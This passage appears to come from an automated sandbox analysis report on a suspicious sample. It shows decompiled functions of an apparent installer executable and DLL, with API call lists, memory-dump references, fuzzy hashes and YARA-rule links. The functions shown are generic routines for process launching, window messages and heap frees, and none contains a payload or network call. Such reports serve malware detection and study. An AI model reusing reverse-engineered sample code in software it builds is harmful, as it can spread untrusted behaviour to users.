                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E67B4FD: _free.LIBCMT ref: 6E67B522
                                                                                                                                                    • _free.LIBCMT ref: 6E67B583
                                                                                                                                                      • Part of subcall function 6E67391E: HeapFree.KERNEL32(00000000,00000000,?,6E67B527,?,00000000,?,?,?,6E67B54E,?,00000007,?,?,6E679B53,?), ref: 6E673934
                                                                                                                                                      • Part of subcall function 6E67391E: GetLastError.KERNEL32(?,?,6E67B527,?,00000000,?,?,?,6E67B54E,?,00000007,?,?,6E679B53,?,?), ref: 6E673946
                                                                                                                                                    • _free.LIBCMT ref: 6E67B58E
                                                                                                                                                    • _free.LIBCMT ref: 6E67B599
                                                                                                                                                    • _free.LIBCMT ref: 6E67B5ED
                                                                                                                                                    • _free.LIBCMT ref: 6E67B5F8
                                                                                                                                                    • _free.LIBCMT ref: 6E67B603
                                                                                                                                                    • _free.LIBCMT ref: 6E67B60E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 7e96a8ca16e791795dd0e933ce7634927f62b81a235f0c9e4e83b0672b1116f2
                                                                                                                                                    • Instruction ID: 00cb861c029feb2ee57cad4e55f7a26dba2911d45cdd0ea70ead6ecb08d9f9e0
                                                                                                                                                    • Opcode Fuzzy Hash: 7e96a8ca16e791795dd0e933ce7634927f62b81a235f0c9e4e83b0672b1116f2
                                                                                                                                                    • Instruction Fuzzy Hash: 34115171940B08EADD30ABF2DC09FCB779E5F00704F844C15A299A7069DB79B9468B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402238, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                    			E00402238() {
				void* __ebx;
				void* __edi;
				intOrPtr _t16;
				void* _t20;
				void* _t26;
				WCHAR* _t28;
				void* _t30;

				_t28 = E0040145C(_t26, _t20);
				E004062CF(L"Exec: command=\"%s\"", _t28);
				E00404F9E(0xffffffeb, _t28);
				_t16 = E00405C6B(_t28);
				 *((intOrPtr*)(_t30 + 8)) = _t16;
				_push(_t28);
				if(_t16 == _t20) {
					_push(L"Exec: failed createprocess (\"%s\")");
					 *((intOrPtr*)(_t30 - 4)) = 1;
					E004062CF();
				} else {
					_push(L"Exec: success (\"%s\")");
					E004062CF();
					if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
						while(WaitForSingleObject( *(__ebp + 8), 0x64) == 0x102) {
							E0040635E(0xf);
						}
						__ebp - 0x10 = GetExitCodeProcess( *(__ebp + 8), __ebp - 0x10);
						if( *((intOrPtr*)(__ebp - 0x28)) < __ebx) {
							if( *(__ebp - 0x10) != __ebx) {
								 *((intOrPtr*)(__ebp - 4)) = 1;
							}
						} else {
							E00405F7D(__edi,  *(__ebp - 0x10));
						}
					}
					_push( *(__ebp + 8));
					CloseHandle();
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}










                                                                                                                                                    0x0040223e
                                                                                                                                                    0x00402246
                                                                                                                                                    0x00402250
                                                                                                                                                    0x00402256
                                                                                                                                                    0x0040225b
                                                                                                                                                    0x0040225e
                                                                                                                                                    0x00402261
                                                                                                                                                    0x004022c2
                                                                                                                                                    0x00401950
                                                                                                                                                    0x00401957
                                                                                                                                                    0x00402263
                                                                                                                                                    0x00402263
                                                                                                                                                    0x00402268
                                                                                                                                                    0x00402272
                                                                                                                                                    0x00402283
                                                                                                                                                    0x0040227e
                                                                                                                                                    0x0040227e
                                                                                                                                                    0x00402298
                                                                                                                                                    0x004022a1
                                                                                                                                                    0x004022b1
                                                                                                                                                    0x004022b3
                                                                                                                                                    0x004022b3
                                                                                                                                                    0x004022a3
                                                                                                                                                    0x004022a7
                                                                                                                                                    0x004022a7
                                                                                                                                                    0x004022a1
                                                                                                                                                    0x004022ba
                                                                                                                                                    0x00402af2
                                                                                                                                                    0x00402af2
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425AD2,74B5EA30,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425AD2,74B5EA30,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32 ref: 00405C90
                                                                                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                    • GetExitCodeProcess.KERNEL32 ref: 00402298
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                    Strings
                                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                                    • Opcode ID: b07d39edd45b6d2841688a986433f0381924528bdc22dd5a03576e07f79a18b6
                                                                                                                                                    • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                    • Opcode Fuzzy Hash: b07d39edd45b6d2841688a986433f0381924528bdc22dd5a03576e07f79a18b6
                                                                                                                                                    • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040487A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040487A(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                                    0x00404888
                                                                                                                                                    0x00404895
                                                                                                                                                    0x0040489b
                                                                                                                                                    0x004048d7
                                                                                                                                                    0x004048d7
                                                                                                                                                    0x004048e6
                                                                                                                                                    0x004048ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004048ef
                                                                                                                                                    0x0040489d
                                                                                                                                                    0x004048aa
                                                                                                                                                    0x004048b2
                                                                                                                                                    0x004048b5
                                                                                                                                                    0x004048c7
                                                                                                                                                    0x004048cd
                                                                                                                                                    0x004048d4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004048d4
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                    • ScreenToClient.USER32 ref: 004048B5
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                    • String ID: f
                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                    • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                    • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                    • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                    • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040324C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040324C(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x42c174; // 0x550f8
					_t11 =  *0x43dd38; // 0x474792
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                                                                                    0x0040325c
                                                                                                                                                    0x0040326a
                                                                                                                                                    0x00403270
                                                                                                                                                    0x00403270
                                                                                                                                                    0x0040327e
                                                                                                                                                    0x00403280
                                                                                                                                                    0x00403286
                                                                                                                                                    0x0040328d
                                                                                                                                                    0x0040328f
                                                                                                                                                    0x0040328f
                                                                                                                                                    0x004032a5
                                                                                                                                                    0x004032b5
                                                                                                                                                    0x004032c7
                                                                                                                                                    0x004032c7
                                                                                                                                                    0x004032cf

                                                                                                                                                    APIs
                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                    • MulDiv.KERNEL32(000550F8,00000064,00474792), ref: 00403295
                                                                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                    • SetDlgItemTextW.USER32 ref: 004032C7
                                                                                                                                                    Strings
                                                                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                    • Opcode ID: 6e71b36604eb8168b9de070626c23bed7d900371b4c5136878c27d07ffa20f21
                                                                                                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                    • Opcode Fuzzy Hash: 6e71b36604eb8168b9de070626c23bed7d900371b4c5136878c27d07ffa20f21
                                                                                                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E675A84, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 6E675ACC
                                                                                                                                                    • __fassign.LIBCMT ref: 6E675CAB
                                                                                                                                                    • __fassign.LIBCMT ref: 6E675CC8
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E675D10
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E675D50
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E675DFC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4031098158-0
                                                                                                                                                    • Opcode ID: a056576ac57bdfec6d30f93456469229dbfe5ec970105818a2a67453ffd188a8
                                                                                                                                                    • Instruction ID: 09bf5fc54fab0b402cbc7f2b06d7867f0661a245f22a1d93ba79a2bad6a17441
                                                                                                                                                    • Opcode Fuzzy Hash: a056576ac57bdfec6d30f93456469229dbfe5ec970105818a2a67453ffd188a8
                                                                                                                                                    • Instruction Fuzzy Hash: D5D19A75D002599FCF21CFE8C8909EEBBB5BF49314F2401AAE855BB341D731AA46CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62B650, Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E62B790: _DebugHeapAllocator.LIBCPMTD ref: 6E62B830
                                                                                                                                                      • Part of subcall function 6E62B790: _DebugHeapAllocator.LIBCPMTD ref: 6E62B885
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62B6B0
                                                                                                                                                      • Part of subcall function 6E62C990: _DebugHeapAllocator.LIBCPMTD ref: 6E62C99E
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62B6D7
                                                                                                                                                      • Part of subcall function 6E62C970: _DebugHeapAllocator.LIBCPMTD ref: 6E62C97E
                                                                                                                                                      • Part of subcall function 6E62B790: _DebugHeapAllocator.LIBCPMTD ref: 6E62B83F
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62B6FE
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E62B712
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62B747
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62B75F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWorkstd::ios_base::good
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1085074254-0
                                                                                                                                                    • Opcode ID: af30ef608ce135fb8223623533bf7c1d9afd3a7a7f7b1f56d8db20bfde80d7b1
                                                                                                                                                    • Instruction ID: b6029826df9e7949d2e8c07e722417f0e56e4a92b639297c06b68aa1010e3a6e
                                                                                                                                                    • Opcode Fuzzy Hash: af30ef608ce135fb8223623533bf7c1d9afd3a7a7f7b1f56d8db20bfde80d7b1
                                                                                                                                                    • Instruction Fuzzy Hash: AC411871D10149EFCB04CFE4D990BEEBBB8BF18314F508929E411AB280EB746A04CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62DDD0, Relevance: 9.1, APIs: 6, Instructions: 82memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62DDFA
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62DE24
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62DE36
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62DE48
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62DE5A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62DE6C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 571936431-0
                                                                                                                                                    • Opcode ID: e7fb4a344b1c338cbb5b8997ddc55e02659b136c6a83fa71ac8a57893fda8a4a
                                                                                                                                                    • Instruction ID: 8c97d57b1d7cb04de47b007f456ec5fa4d79152a35a89aa05bde8a841252350a
                                                                                                                                                    • Opcode Fuzzy Hash: e7fb4a344b1c338cbb5b8997ddc55e02659b136c6a83fa71ac8a57893fda8a4a
                                                                                                                                                    • Instruction Fuzzy Hash: 2B316574600109EFCB48CF98C590E9DBBB5FF88358B6481A9E809AB356C730EE51DF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65433F, Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 6E65437A
                                                                                                                                                    • GetParent.USER32(?), ref: 6E654388
                                                                                                                                                    • GetParent.USER32(?), ref: 6E65439F
                                                                                                                                                    • GetLastActivePopup.USER32(?), ref: 6E6543B9
                                                                                                                                                    • IsWindowEnabled.USER32(?), ref: 6E6543CD
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 6E6543E0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 670545878-0
                                                                                                                                                    • Opcode ID: b244f22bb9c03ec5f0cb0f771698591d132631aca2bf9f8af3b969058d68825e
                                                                                                                                                    • Instruction ID: 78355608e0eda9037978ce4f7b19ef8aaecf7b52d07830b571faccce10fe6551
                                                                                                                                                    • Opcode Fuzzy Hash: b244f22bb9c03ec5f0cb0f771698591d132631aca2bf9f8af3b969058d68825e
                                                                                                                                                    • Instruction Fuzzy Hash: 7511D232B45723ABDB514AEB8884B5F37AC6F67B55B0101A5E817E7324DBE0DC3246A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64BB10, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 324memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64BB41
                                                                                                                                                      • Part of subcall function 6E625AA0: _DebugHeapAllocator.LIBCPMTD ref: 6E625AD8
                                                                                                                                                      • Part of subcall function 6E625AA0: _DebugHeapAllocator.LIBCPMTD ref: 6E625B1B
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                      • Part of subcall function 6E628FF0: _DebugHeapAllocator.LIBCPMTD ref: 6E629045
                                                                                                                                                      • Part of subcall function 6E662DFE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64BE56
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextDispatcherExceptionIdentityQueueUserWork
                                                                                                                                                    • String ID: %s+%d$-%d$get_ControlViewWalker == NULL
                                                                                                                                                    • API String ID: 603298931-743771361
                                                                                                                                                    • Opcode ID: 12a1247bb6e4bcd9ae54d6208030ecf37d836f6d95a1146df5a0dbfa24b0e5a9
                                                                                                                                                    • Instruction ID: 460adb2be0af986977052bd2f64689c335ce80c220b93f5d64128a9cd69e621e
                                                                                                                                                    • Opcode Fuzzy Hash: 12a1247bb6e4bcd9ae54d6208030ecf37d836f6d95a1146df5a0dbfa24b0e5a9
                                                                                                                                                    • Instruction Fuzzy Hash: E3E17E71C00148DFCB04DFE8D990BEEBBB8AF59304F608568E415BB295DB746A05CFA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6570EF, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 215windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E65AA2A: __EH_prolog3.LIBCMT ref: 6E65AA31
                                                                                                                                                    • SendMessageW.USER32(?,00000433,00000000,?), ref: 6E6572C7
                                                                                                                                                    • GetWindowLongW.USER32(?,000000FC), ref: 6E6572D2
                                                                                                                                                    • GetWindowLongW.USER32(?,000000FC), ref: 6E6572E6
                                                                                                                                                    • SetWindowLongW.USER32 ref: 6E65730F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongWindow$H_prolog3MessageSend
                                                                                                                                                    • String ID: ,
                                                                                                                                                    • API String ID: 4140968126-3772416878
                                                                                                                                                    • Opcode ID: 854c4360c325fd100d765e9f946ab8baf2701596b410c16c7909fe20f456b92a
                                                                                                                                                    • Instruction ID: c4d59eab946cbef973faf4f28e601dc7a3d02fd96afc6d5b9219cae2b1066114
                                                                                                                                                    • Opcode Fuzzy Hash: 854c4360c325fd100d765e9f946ab8baf2701596b410c16c7909fe20f456b92a
                                                                                                                                                    • Instruction Fuzzy Hash: 7371E731700615EFDF05AFF5C898AAE77BAFF46314B004569E8129B391DB70E820CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65B1D4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 145COMMON
                                                                                                                                                    Download Yara Rule
